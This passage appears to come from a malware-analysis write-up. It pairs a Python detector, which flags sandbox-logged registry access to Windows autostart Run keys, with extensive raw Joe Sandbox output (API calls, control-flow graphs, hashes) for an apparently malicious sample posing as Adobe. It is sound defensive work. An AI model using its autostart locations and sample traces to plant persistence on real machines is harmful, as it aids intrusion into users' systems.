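HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Access-mask bits that allow modifying a key (winreg.h).
KEY_SET_VALUE = 0x0002
KEY_CREATE_SUB_KEY = 0x0004

# Well-known autostart locations relative to the hive (subset chosen for this example).
AUTOSTART_KEYS = {
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
    r"software\microsoft\windows\currentversion\policies\explorer\run",
}

# Index of the samDesired argument for the key-opening APIs decoded here.
SAM_INDEX = {"RegOpenKeyExA": 3, "RegOpenKeyExW": 3,
             "RegCreateKeyExA": 5, "RegCreateKeyExW": 5}

API_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str


def parse_api_lines(text: str) -> list:
    """Turn the bullet lines into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        # Extra stack slots printed after the real arguments are kept but never indexed.
        args = raw.split(",") if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref")))
    return calls


def decode_hive(arg: str):
    """Map a hex root-key handle such as '80000002' to its HKEY_* name, or None."""
    try:
        return HIVES.get(int(arg, 16))
    except ValueError:  # '?' means the sandbox could not recover the value
        return None


def find_autostart_access(calls: list) -> list:
    """Flag RegOpenKeyEx/RegCreateKeyEx calls that target a known autostart key.

    Each finding records the hive, the normalized key path, whether the requested
    access mask permits writes, the call site, and which registry-modifying APIs
    follow it in the same listing: an open with KEY_SET_VALUE followed by a set or
    delete is how an autostart entry is installed or cleaned up.
    """
    findings = []
    for i, call in enumerate(calls):
        if call.api not in SAM_INDEX or len(call.args) < 2:
            continue
        key = call.args[1].rstrip("\\").lower()
        if key not in AUTOSTART_KEYS:
            continue
        try:
            sam = int(call.args[SAM_INDEX[call.api]], 16)
            write_access = bool(sam & (KEY_SET_VALUE | KEY_CREATE_SUB_KEY))
        except (IndexError, ValueError):
            write_access = None  # mask not recovered by the sandbox
        followed_by = [c.api for c in calls[i + 1:]
                       if c.api.startswith(("RegSetValue", "RegDeleteValue", "RegDeleteKey"))]
        findings.append({"hive": decode_hive(call.args[0]), "key": key,
                         "write_access": write_access, "ref": call.ref,
                         "followed_by": followed_by})
    return findings


if __name__ == "__main__":
    for finding in find_autostart_access(parse_api_lines(SAMPLE_API_LINES)):
        print(finding)
```

Run against the sample it reports one finding: HKEY_LOCAL_MACHINE, the Policies\Explorer\Run key, write access requested at call site 00412988, followed by RegDeleteValueW. On a live host the same location is worth checking under both HKLM and HKCU, since the policy Run key is rarely populated on a clean machine and any value there deserves a look.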
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                      • GetLastError.KERNEL32 ref: 0043FB02
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                      • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                      • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                      • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                      Execution Graph

                                                      Execution Coverage:8.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:38
                                                      Total number of Limit Nodes:7
                                                      execution_graph 14666 94d710 DuplicateHandle 14667 94d7a6 14666->14667 14668 94ad30 14669 94ad3f 14668->14669 14672 94ae18 14668->14672 14677 94ae28 14668->14677 14673 94ae5c 14672->14673 14675 94ae39 14672->14675 14673->14669 14674 94b060 GetModuleHandleW 14676 94b08d 14674->14676 14675->14673 14675->14674 14676->14669 14678 94ae5c 14677->14678 14680 94ae39 14677->14680 14678->14669 14679 94b060 GetModuleHandleW 14681 94b08d 14679->14681 14680->14678 14680->14679 14681->14669 14682 94d0c0 14683 94d106 GetCurrentProcess 14682->14683 14685 94d151 14683->14685 14686 94d158 GetCurrentThread 14683->14686 14685->14686 14687 94d195 GetCurrentProcess 14686->14687 14688 94d18e 14686->14688 14689 94d1cb 14687->14689 14688->14687 14690 94d1f3 GetCurrentThreadId 14689->14690 14691 94d224 14690->14691 14692 944668 14693 94467a 14692->14693 14694 944686 14693->14694 14696 944779 14693->14696 14697 94479d 14696->14697 14701 944888 14697->14701 14705 944878 14697->14705 14703 9448af 14701->14703 14702 94498c 14703->14702 14709 9444b0 14703->14709 14706 9448af 14705->14706 14707 94498c 14706->14707 14708 9444b0 CreateActCtxA 14706->14708 14708->14707 14710 945918 CreateActCtxA 14709->14710 14712 9459db 14710->14712

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 295 94d0b1-94d14f GetCurrentProcess 299 94d151-94d157 295->299 300 94d158-94d18c GetCurrentThread 295->300 299->300 301 94d195-94d1c9 GetCurrentProcess 300->301 302 94d18e-94d194 300->302 303 94d1d2-94d1ed call 94d699 301->303 304 94d1cb-94d1d1 301->304 302->301 308 94d1f3-94d222 GetCurrentThreadId 303->308 304->303 309 94d224-94d22a 308->309 310 94d22b-94d28d 308->310 309->310
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D13E
                                                      • GetCurrentThread.KERNEL32 ref: 0094D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0094D211
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 0fee773c68225fcddbbacd3e5c70f90d68d5b61ceb1d1e4a168271391931df11
                                                      • Instruction ID: b228266d04b42d23cb52d129949ca8a1fbc7df4669606bbae1f03cb0aa0a7f62
                                                      • Opcode Fuzzy Hash: 0fee773c68225fcddbbacd3e5c70f90d68d5b61ceb1d1e4a168271391931df11
                                                      • Instruction Fuzzy Hash: B25168B09013498FDB18DFA9D948BAEBBF1FF49304F208059E419A73A0DB749984CB65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 317 94d0c0-94d14f GetCurrentProcess 321 94d151-94d157 317->321 322 94d158-94d18c GetCurrentThread 317->322 321->322 323 94d195-94d1c9 GetCurrentProcess 322->323 324 94d18e-94d194 322->324 325 94d1d2-94d1ed call 94d699 323->325 326 94d1cb-94d1d1 323->326 324->323 330 94d1f3-94d222 GetCurrentThreadId 325->330 326->325 331 94d224-94d22a 330->331 332 94d22b-94d28d 330->332 331->332
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D13E
                                                      • GetCurrentThread.KERNEL32 ref: 0094D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0094D211
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: c573a507886977c9985a93952745d617df7570fe05aa4c2e90e665bce48180ca
                                                      • Instruction ID: e0b3cb1b5ea3e788ff862c09a3cf9df300048840081ecb2b8dee1747e7b39616
                                                      • Opcode Fuzzy Hash: c573a507886977c9985a93952745d617df7570fe05aa4c2e90e665bce48180ca
                                                      • Instruction Fuzzy Hash: EE5178B09013098FDB18DFA9D948BAEBBF5FF48314F208059E419A7360DB749984CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 362 94ae28-94ae37 363 94ae63-94ae67 362->363 364 94ae39-94ae46 call 94a14c 362->364 365 94ae69-94ae73 363->365 366 94ae7b-94aebc 363->366 369 94ae5c 364->369 370 94ae48 364->370 365->366 373 94aebe-94aec6 366->373 374 94aec9-94aed7 366->374 369->363 421 94ae4e call 94b0b0 370->421 422 94ae4e call 94b0c0 370->422 373->374 376 94aed9-94aede 374->376 377 94aefb-94aefd 374->377 375 94ae54-94ae56 375->369 380 94af98-94afaf 375->380 378 94aee0-94aee7 call 94a158 376->378 379 94aee9 376->379 381 94af00-94af07 377->381 383 94aeeb-94aef9 378->383 379->383 395 94afb1-94b010 380->395 384 94af14-94af1b 381->384 385 94af09-94af11 381->385 383->381 387 94af1d-94af25 384->387 388 94af28-94af31 call 94a168 384->388 385->384 387->388 393 94af33-94af3b 388->393 394 94af3e-94af43 388->394 393->394 396 94af45-94af4c 394->396 397 94af61-94af6e 394->397 413 94b012-94b014 395->413 396->397 399 94af4e-94af5e call 94a178 call 94a188 396->399 404 94af70-94af8e 397->404 405 94af91-94af97 397->405 399->397 404->405 414 94b016-94b03e 413->414 415 94b040-94b058 413->415 414->415 416 94b060-94b08b GetModuleHandleW 415->416 417 94b05a-94b05d 415->417 418 94b094-94b0a8 416->418 419 94b08d-94b093 416->419 417->416 419->418 421->375 422->375
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0094B07E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 8f132f3d084e7676a88f9a70580a6baf03b1003291054bf8df4ed45c4af7b5d7
                                                      • Instruction ID: 305038057c5bd4a40c5fdf4d1213975c1ef8f26861eecd3ad664f2c9091d617d
                                                      • Opcode Fuzzy Hash: 8f132f3d084e7676a88f9a70580a6baf03b1003291054bf8df4ed45c4af7b5d7
                                                      • Instruction Fuzzy Hash: 99815770A00B458FD724DF2AD445BAABBF5FF88304F00892DE49AD7A50D775E849CB91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 423 9444b0-9459d9 CreateActCtxA 426 9459e2-945a3c 423->426 427 9459db-9459e1 423->427 434 945a3e-945a41 426->434 435 945a4b-945a4f 426->435 427->426 434->435 436 945a60 435->436 437 945a51-945a5d 435->437 438 945a61 436->438 437->436 438->438
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 009459C9
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: bc14f6ffa2ccc70d7fd57756e8423dedf2d9ef3b877ded06571550cf30dfed31
                                                      • Instruction ID: 013c40b27d7955f93e8a1a3530a5d5ebcf32a93bd52b9096e528b299cc4575b7
                                                      • Opcode Fuzzy Hash: bc14f6ffa2ccc70d7fd57756e8423dedf2d9ef3b877ded06571550cf30dfed31
                                                      • Instruction Fuzzy Hash: 9D41E1B0C00B1DCBDB24DFA9C884B9EBBF5BF49304F20816AD418AB255DB756946CF91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 440 94590c-945910 441 94591c-9459d9 CreateActCtxA 440->441 443 9459e2-945a3c 441->443 444 9459db-9459e1 441->444 451 945a3e-945a41 443->451 452 945a4b-945a4f 443->452 444->443 451->452 453 945a60 452->453 454 945a51-945a5d 452->454 455 945a61 453->455 454->453 455->455
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 009459C9
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: a9bcf851cd4e6701abd92a3ecbd8abb269572b18a623de27ae01d9775fa242f5
                                                      • Instruction ID: 3b107a1143e9e4a299dc3ba15fbce73b859de130a98f23af376104bbf1695719
                                                      • Opcode Fuzzy Hash: a9bcf851cd4e6701abd92a3ecbd8abb269572b18a623de27ae01d9775fa242f5
                                                      • Instruction Fuzzy Hash: 5841E2B0C00719CBDB24DFA9C984BDDBBF5BF48304F20816AD418AB255DB756946CF91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 457 94d709-94d7a4 DuplicateHandle 458 94d7a6-94d7ac 457->458 459 94d7ad-94d7ca 457->459 458->459
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094D797
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 6a5b23825bdf9c2dd4f6f06a8afdeb3f5d263328dbc76d3a9d8f4f655c5d74d7
                                                      • Instruction ID: c5ad150e4ce6f5677d594c6e641738a589983374baf832f423c68a65ae15315c
                                                      • Opcode Fuzzy Hash: 6a5b23825bdf9c2dd4f6f06a8afdeb3f5d263328dbc76d3a9d8f4f655c5d74d7
                                                      • Instruction Fuzzy Hash: 7521E3B59002489FDB10CFAAD584AEEBFF5FB48314F14841AE958A3311D379A945CFA1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 462 94d710-94d7a4 DuplicateHandle 463 94d7a6-94d7ac 462->463 464 94d7ad-94d7ca 462->464 463->464
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094D797
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 834344a2699ea5c052ee39c142285fdc29e7459e5cf198281140ddae62e98d0b
                                                      • Instruction ID: a3267f9e3c003d05dea387c20400b5814399fffa97557658f19ef5a61c02bc45
                                                      • Opcode Fuzzy Hash: 834344a2699ea5c052ee39c142285fdc29e7459e5cf198281140ddae62e98d0b
                                                      • Instruction Fuzzy Hash: 6821D5B59012489FDB10DF9AD584ADEFFF9FB48310F14841AE918A3350D379A944CFA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 467 94b018-94b058 468 94b060-94b08b GetModuleHandleW 467->468 469 94b05a-94b05d 467->469 470 94b094-94b0a8 468->470 471 94b08d-94b093 468->471 469->468 471->470
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0094B07E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: e10e58d846efa447f1f3e5c12a6b6ba695f6b0a83c7ff30c2199a4d3ebb152e3
                                                      • Instruction ID: 10b456fba5bd2ed17c14e8476e3d5f2eff1457e6cbb3c37df6b489a8a4307353
                                                      • Opcode Fuzzy Hash: e10e58d846efa447f1f3e5c12a6b6ba695f6b0a83c7ff30c2199a4d3ebb152e3
                                                      • Instruction Fuzzy Hash: 6F11DFB5C003498FCB20DFAAC448A9EFBF8EB88714F10841AD929A7210D379A545CFA1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063947610.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5998df40f1ac839f5aad7e8a7ba9fcc4cb4c749da040dbf2fac46a763d22bd6c
                                                      • Instruction ID: e6f52a474ad0bc7738e3722409ed26c5ce5e40c4df175b7fbaf666a0254b6c5c
                                                      • Opcode Fuzzy Hash: 5998df40f1ac839f5aad7e8a7ba9fcc4cb4c749da040dbf2fac46a763d22bd6c
                                                      • Instruction Fuzzy Hash: 8721D371504708DFDB15DF24D584B26BB66FB84314F20C569DB098B356CB3AD807CA61
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063947610.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6fa095f01c3cbea77616b2cd0b36d65869598fafb0d2dd8821a63d348ca9c2a
                                                      • Instruction ID: f2815768d3e5877b5b93c0a74dcbfca590119a56d19655c712abfeb93067fa1d
                                                      • Opcode Fuzzy Hash: c6fa095f01c3cbea77616b2cd0b36d65869598fafb0d2dd8821a63d348ca9c2a
                                                      • Instruction Fuzzy Hash: 5521F571504308DFDB05DF24D5C0B26BB66FB84314F20C56DDB098B256C33AE846DAA1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063947610.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: cdc4a4065e7c590189452a4c819d10f7356e0fcebcb9bbd5a007bd1ab44bedaa
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: D811BE75504344DFCB02CF20C5C4B25BB62FB84314F24C6AADA498B256C33AE80ACBA1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063947610.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: 51afa2bf9103d28a337b7c202c72e4d25585914077a62efa7036c844627b0509
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 9A11BE75504784CFCB16CF24D5C4B25FB62FB84314F24C6A9DA498B656C33AD80ACB62
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063894956.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f965323cb2f582037488c9d4374e9f686074dd5b98fcfa6232c0c2f9f8e56a1b
                                                      • Instruction ID: 290889b4bfedd9228da33198c5a0329cd27daa14a6bf22b22d57592d41ac9022
                                                      • Opcode Fuzzy Hash: f965323cb2f582037488c9d4374e9f686074dd5b98fcfa6232c0c2f9f8e56a1b
                                                      • Instruction Fuzzy Hash: 8A012B310043849EE7209F17CD88B67BF9CFF47324F18C52AED198A286C2399844CAB1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063894956.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77b6ee7a1e0e5add2af0f2311c59c00ead3c033505edd8b2ee8e6df4df13bdde
                                                      • Instruction ID: 936b291524115388eac5c6ce52b102cfa7366077ae9090d5649fe21d6071877b
                                                      • Opcode Fuzzy Hash: 77b6ee7a1e0e5add2af0f2311c59c00ead3c033505edd8b2ee8e6df4df13bdde
                                                      • Instruction Fuzzy Hash: A5F062714043849EE7109F16CC88B62FF98EF56734F18C55AED485A286C2799844CAB1

                                                      Execution Graph

                                                      Execution Coverage:7.2%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:33
                                                      Total number of Limit Nodes:5
                                                      execution_graph 15880 2d2d0c0 15881 2d2d106 GetCurrentProcess 15880->15881 15883 2d2d151 15881->15883 15884 2d2d158 GetCurrentThread 15881->15884 15883->15884 15885 2d2d195 GetCurrentProcess 15884->15885 15886 2d2d18e 15884->15886 15887 2d2d1cb 15885->15887 15886->15885 15888 2d2d1f3 GetCurrentThreadId 15887->15888 15889 2d2d224 15888->15889 15890 2d2d710 DuplicateHandle 15891 2d2d7a6 15890->15891 15892 2d2ad30 15895 2d2ae28 15892->15895 15893 2d2ad3f 15896 2d2ae5c 15895->15896 15898 2d2ae39 15895->15898 15896->15893 15897 2d2b060 GetModuleHandleW 15899 2d2b08d 15897->15899 15898->15896 15898->15897 15899->15893 15900 2d24668 15901 2d2467a 15900->15901 15902 2d24686 15901->15902 15904 2d24779 15901->15904 15905 2d2479d 15904->15905 15909 2d24888 15905->15909 15913 2d24878 15905->15913 15911 2d248af 15909->15911 15910 2d2498c 15910->15910 15911->15910 15917 2d244b0 15911->15917 15915 2d24888 15913->15915 15914 2d2498c 15915->15914 15916 2d244b0 CreateActCtxA 15915->15916 15916->15914 15918 2d25918 CreateActCtxA 15917->15918 15920 2d259db 15918->15920

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 295 2d2d0b1-2d2d14f GetCurrentProcess 299 2d2d151-2d2d157 295->299 300 2d2d158-2d2d18c GetCurrentThread 295->300 299->300 301 2d2d195-2d2d1c9 GetCurrentProcess 300->301 302 2d2d18e-2d2d194 300->302 303 2d2d1d2-2d2d1ed call 2d2d699 301->303 304 2d2d1cb-2d2d1d1 301->304 302->301 308 2d2d1f3-2d2d222 GetCurrentThreadId 303->308 304->303 309 2d2d224-2d2d22a 308->309 310 2d2d22b-2d2d28d 308->310 309->310
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02D2D13E
                                                      • GetCurrentThread.KERNEL32 ref: 02D2D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 02D2D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 02D2D211
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: af859f8e476028a43cb40e0a738ca30a4c70fe8cc986b1067697d3dfaa4c28f5
                                                      • Instruction ID: 8688f815d2877558b60e319e5bdf7e08d9a4ab09a0244acd9079525f3efd0894
                                                      • Opcode Fuzzy Hash: af859f8e476028a43cb40e0a738ca30a4c70fe8cc986b1067697d3dfaa4c28f5
                                                      • Instruction Fuzzy Hash: 9C5147B09013198FDB19DFA9D548BEEBBF1FF88308F208459E419A7360D7749948CB65

                                                       Control-flow Graph

                                                       Graph image not reproduced in this text export. Function 02D2D0C0-02D2D28D: basic blocks call GetCurrentProcess, GetCurrentThread, GetCurrentProcess and GetCurrentThreadId, plus an internal call to 02D2D699 (same block layout as the 02D2D0B1 function above).
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02D2D13E
                                                      • GetCurrentThread.KERNEL32 ref: 02D2D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 02D2D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 02D2D211
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 3ec067d8d55480f38e5d19aa1893406388584ce805019d64af1674b154dab246
                                                      • Instruction ID: 09daf9e53287884db4e6bdd873b230f937bb2407aad14f69a0c8269323eaf22e
                                                      • Opcode Fuzzy Hash: 3ec067d8d55480f38e5d19aa1893406388584ce805019d64af1674b154dab246
                                                      • Instruction Fuzzy Hash: 4F5135B09013098FDB18DFAAD548BEEBBF1FF88314F208459E419A7360D7749944CB65

                                                       Control-flow Graph

                                                       Graph image not reproduced in this text export. Function 02D2AE28-02D2B0A8: internal calls to 02D2A14C, 02D2B0B0 or 02D2B0C0 (indirect call at 02D2AE4E), 02D2A158, 02D2A168, 02D2A178 and 02D2A188; the block at 02D2B060 calls GetModuleHandleW.
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02D2B07E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: db4fc20041a269e808453efd7b61f092cb0b73daf295735e4f4b53390f37f127
                                                      • Instruction ID: 98bc77481a83e0739444c5ae9de2f4db363e3e552f46f9bbedd1692d01ed0550
                                                      • Opcode Fuzzy Hash: db4fc20041a269e808453efd7b61f092cb0b73daf295735e4f4b53390f37f127
                                                      • Instruction Fuzzy Hash: 1F713470A00B158FD724DF29C44075ABBF1FF88308F10892AE49A97B50DB78E849CB90

                                                       Control-flow Graph

                                                       Graph image not reproduced in this text export. Function 02D2590C-02D25B14: the block at 02D25918 calls CreateActCtxA; no other API calls.
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02D259C9
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 1dec7df5a995d2ea1dcd6dafcd7a7f8e6d4a8921b42d19ef5501ee2aa1c8a977
                                                      • Instruction ID: c2a119d43e91c2b5cde3656445dbdb8fd7e42cb02bc9f6b4f94d38b44a71a141
                                                      • Opcode Fuzzy Hash: 1dec7df5a995d2ea1dcd6dafcd7a7f8e6d4a8921b42d19ef5501ee2aa1c8a977
                                                      • Instruction Fuzzy Hash: 1B41E4B0C00729CBDB25DFA9C885BDDBBB5BF49308F60805AD408AB355DB75694ACF50

                                                       Control-flow Graph

                                                       Graph image not reproduced in this text export. Function 02D244B0-02D25B14: the first block (02D244B0-02D259D9) calls CreateActCtxA; the remaining blocks match the 02D2590C function above.
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02D259C9
                                                      Memory Dump Source
